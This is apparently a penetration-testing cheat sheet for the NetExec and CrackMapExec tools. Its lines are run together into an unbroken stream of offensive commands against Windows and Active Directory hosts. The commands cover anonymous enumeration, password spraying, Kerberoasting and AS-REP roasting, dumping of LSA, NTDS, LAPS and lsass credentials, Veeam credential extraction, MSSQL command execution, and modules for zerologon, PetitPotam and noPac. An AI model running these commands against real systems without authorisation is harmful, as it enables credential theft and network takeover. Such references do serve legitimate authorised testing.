A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting
- NetExec: https://github.com/Pennyw0rth/NetExec
- CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)
- Installation: https://www.netexec.wiki/getting-started/installation
netexec smb targetnetexec smb target -u '' -p ''netexec smb target -u 'guest' -p ''netexec smb target -u '' -p '' --sharesnetexec smb target -u username -p password --sharesnetexec smb target -u '' -p '' --usersnetexec smb target -u '' -p '' --rid-brutenetexec smb target -u username -p password --usersnetexec smb target -u username -p password --local-authnetexec smb target -u username -p password -knetexec smb target(s) --gen-relay-list relay.txtnetexec smb target -u users.txt -p password --continue-on-successnetexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-successnetexec ssh target -u username -p password --continue-on-successnetexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-polnetexec smb target -u username -p password -M spider_plusnetexec smb target -u username -p password -M spider_plus -o READ_ONLY=falsenetexec smb target -u username -p password -k --get-file target_file output_file --share sharenamenetexec ftp target -u username -p password --lsnetexec ftp target -u username -p password --ls folder_namenetexec ftp target -u username -p password --ls folder_name --get file_namenetexec ldap target -u '' -p '' --usersnetexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groupsnetexec ldap target -u username -p password --kerberoasting kerb.txtnetexec ldap target -u username -p password --asreproast asrep.txtnetexec mssql target -u username -p password-X for powershell and -x for cmd
netexec mssql target -u username -p password -x command_to_executenetexec mssql target -u username -p password --get-file output_file target_filenetexec smb target -u username -p password --local-auth --lsanetexec ldap target -u username -p password --gmsa-convert-id idnetexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_accountnetexec smb target -u username -p password -M gpp_passwordnetexec smb target -u username -p password --lapsnetexec smb target -u username -p password --laps --dpapinetexec smb target -u username -p password --ntdsnxc ldap target -u username -p password --bloodhound --dns-server ip --dns-tcp -c allChecks whether the WebClient service is running on the target
netexec smb ip -u username -p password -M webdav Extracts credentials from local Veeam SQL Database
netexec smb target -u username -p password -M veeamCreates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions
netexec smb ip -u username -p password -M slinky Dump NTDS with ntdsutil
netexec smb ip -u username -p password -M ntdsutil Checks whether LDAP signing and binding are required and/or enforced
cme ldap target -u username -p password -M ldap-checkernetexec smb target -u username -p password -M zerologonnetexec smb target -u username -p password -M petitpotamnetexec smb target -u username -p password -M nopacnetexec ldap target -u username -p password -M maqnetexec ldap target -u username -p password -M adcsnetexec smb target -u username -p password -M lsassynetexec smb target -u username -p password -M msol